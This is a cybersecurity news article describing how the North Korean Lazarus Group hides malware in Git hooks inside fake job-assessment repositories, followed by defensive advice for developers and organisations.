North Korean Hackers Use Git Hooks for Cross-Platform Malware Attacks
Key Takeaways North Korean threat actors, specifically the Lazarus Group, are leveraging Git hooks to deliver cross-platform malware. The attacks target software developers via fake job offers on...
Key Takeaways
- North Korean threat actors, specifically the Lazarus Group, are leveraging Git hooks to deliver cross-platform malware.
- The attacks target software developers via fake job offers on platforms like LinkedIn, luring them into cloning malicious GitHub repositories.
- The malware, deployed as a “pre-commit” Git hook, is designed to steal cryptocurrency wallets, credentials, and establish persistent access across Windows, macOS, and Linux systems.
- This campaign, an evolution of the “Contagious Interview” operation, highlights a sophisticated shift toward weaponizing developer tools for initial access and payload delivery.
A new, highly sophisticated campaign attributed to North Korean state-sponsored hackers has emerged, demonstrating a significant evolution in their tactics. Rather than relying on traditional attack vectors, these threat actors are now embedding malicious code directly within Git hooks, a core feature of the version control system widely used by software developers. This strategic shift allows for the deployment of cross-platform malware by exploiting the very tools essential to modern development workflows.
Table Of Content
This operation is a continuation of the long-running “Contagious Interview” campaign, previously linked to the notorious Lazarus Group. The attackers initiate contact with software developers on professional networking sites, such as LinkedIn, under the guise of legitimate recruitment opportunities. Following initial engagement, victims are presented with a technical coding assessment hosted on a GitHub repository. The moment a developer clones this repository, the infection chain is initiated.
Researchers at OpenSourceMalware were the first to identify and detail this novel technique. Their analysis revealed that the malicious script is concealed within the repository’s .githooks directory, specifically as a pre-commit hook. This design ensures that the payload executes automatically when the developer attempts to commit code, even before the commit object is fully written to the repository. The subtle nature of this attack, combined with developers’ inherent trust in job-related coding tasks, makes it particularly challenging to detect in its early stages.
Git Hooks: A Covert Delivery Mechanism
The deployed malware exhibits cross-platform capabilities. Upon activation, the hook script intelligently identifies the victim’s operating system, then silently communicates with a remote command-and-control (C2) server to fetch the appropriate malicious payload. This adaptive approach ensures that Windows users receive a specific malware variant, while macOS and Linux users are targeted with a different, tailored version.
Regardless of the operating system, the ultimate objectives of the attack remain consistent: exfiltrate cryptocurrency wallet data, harvest sensitive user credentials, and establish a persistent backdoor for remote access to the compromised machine. Git hooks are an integral feature of Git, the distributed version control system utilized by virtually every developer globally. These automated scripts are designed to execute at predefined stages of the development lifecycle. Legitimate applications of Git hooks include enforcing coding standards, running automated tests, or validating commit messages before code is integrated.
In this malicious campaign, the Lazarus Group strategically places a harmful pre-commit hook within the GitHub repository provided to job candidates. The script itself is intentionally minimalist and appears benign upon superficial inspection. When a developer proceeds with a code commit, the hook silently runs in the background. It first fingerprints the operating system, then establishes contact with a remote server whose domain is crafted to mimic legitimate developer infrastructure.
The C2 server then delivers an OS-specific payload. For macOS and Linux systems, a shell script is provided, whereas Windows machines receive a batch-compatible payload. Both variants install persistent implants capable of stealing credentials, siphoning funds from cryptocurrency wallets, and maintaining communication with the attackers. All these malicious activities occur while the developer perceives a normal, successful commit operation.
Cross-Platform Malware and Persistence
The adaptability of this campaign across multiple operating systems is a notable feature. Most malware is designed with a single OS in mind, but this attack seamlessly delivers customized payloads for macOS, Linux, and Windows from a unified entry point. This level of operational flexibility underscores the capabilities of a well-resourced and experienced threat group, indicative of significant investment in maintaining active and sophisticated campaigns.
The implants utilized in this campaign are associated with known malware families previously employed by the Lazarus Group, including BeaverTail and InvisibleFerret. These tools are equipped with a range of functionalities, such as keylogging, remote access capabilities, browser data exfiltration, and general file theft. Furthermore, researchers have observed the use of “post-checkout” hooks. These hooks execute whenever a developer switches branches within the repository, providing the malware with additional opportunities to re-execute and maintain persistence without overt user interaction.
What You Should Do
- Exercise Extreme Caution with External Repositories: Treat any code repository received as part of a job application or from an unknown source as potentially malicious until thoroughly vetted.
- Inspect
.githooksDirectories: Before interacting with a new repository, manually inspect the.githooksdirectory for any suspicious scripts, especiallypre-commitorpost-checkouthooks. Look for unfamiliar commands, external network connections, or obfuscated code. - Utilize Isolated Environments: Clone and execute unknown repositories within isolated virtual machines or sandboxed environments that do not contain sensitive data or credentials.
- Implement Organization-Wide Git Hook Policies: For development teams, establish and enforce policies for Git hook usage, potentially disallowing local hooks or requiring central management and approval of hook scripts.
- Monitor Network Traffic for Anomalies: Implement network monitoring to detect unusual outbound connections from developer workstations, particularly those originating from Git-related processes.
- Educate Developers on Social Engineering: Conduct regular training on social engineering tactics, especially those involving fake job offers or technical assessments designed to deliver malware.
- Report Suspicious Activity: Share any identified malicious Git hook patterns or related Indicators of Compromise (IoCs) with threat intelligence platforms and the wider security community to aid in rapid response and defense.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.